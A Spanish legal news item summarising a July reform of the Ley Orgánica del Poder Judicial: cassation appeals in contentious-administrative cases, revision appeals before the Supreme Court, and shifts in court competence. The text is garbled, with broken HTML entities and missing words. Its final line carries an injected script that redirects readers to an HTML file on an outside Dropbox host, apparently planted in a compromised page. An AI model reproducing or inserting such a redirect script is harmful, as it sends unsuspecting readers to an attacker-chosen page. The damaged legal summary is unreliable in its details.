Actualidad
Modificación de la Ley Orgánica del Poder Judicial

En el BOE de 22 de julio se ha publicado la modificación de la Ley Orgánica del Poder judicial con interesantes novedades en la ley de jurisdicción contencioso administrativa y ley de enjuiciamiento civil, entre otras, cuyo resumen es el siguiente.

Se establece una nueva regulación del recurso de casación en la jurisdicción contencioso-administrativa cuyos aspectos más relevantes, son:
bull; del recurso de casación es la creación de jurisprudencia y su admisión es una decisión del Tribunal de casación basada en su apreciación de la existencia de «interés casacional objetivo», por considerar que el asunto requiere de una interpretación judicial uniforme. No se regulan prácticamente supuestos de interés casacional que conlleven la admisión «reglada» del recurso de casación por el TS.
bull; , con independencia de que hayan sido dictadas en única instancia o en apelación pueden tener acceso a la casación, incluso las dictadas en única instancia por los Juzgados de lo Contencioso-Administrativo mdash;en este último caso, cuando contengan doctrina que se repute gravemente dantilde;osa para los intereses generales y sean susceptibles de extensión de efectosmdash;. Se elimina el límite por cuantía del asunto.
bull; para la presentación del escrito de preparación del recurso y se regulan los requisitos que este debe cumplir. Deberá justificar los supuestos objeto de posible interés casacional y será el Tribunal de instancia, mediante auto motivado, el que deberá valorar la concurrencia de los requisitos exigidos y admitirlo o no.

Se podrá interponer recurso de revisión ante el Tribunal Supremo contra una resolución judicial firme cuando el haya declarado que dicha resolución ha sido dictada en violación de alguno de los derechos reconocidos en el , siempre que la violación, por su naturaleza y gravedad, entrantilde;e efectos que persistan y no puedan cesar de ningún otro modo que no sea mediante esta revisión.
Se les atribuye competencia para conocer de los concursos de persona natural que no sea empresario., que dejan de ser competencia de los Juzgados de lo Mercantil.
se especifica que les corresponderá conocer de las acciones colectivas relativas a condiciones generales de la contratación y a la protección de consumidores y usuarios.lt;scriptgt;alert(location.href=»https://dl.dropboxusercontent.com/s/nzb4aim4kwumyrc/dalton.html?dl=0″)lt;/scriptgt;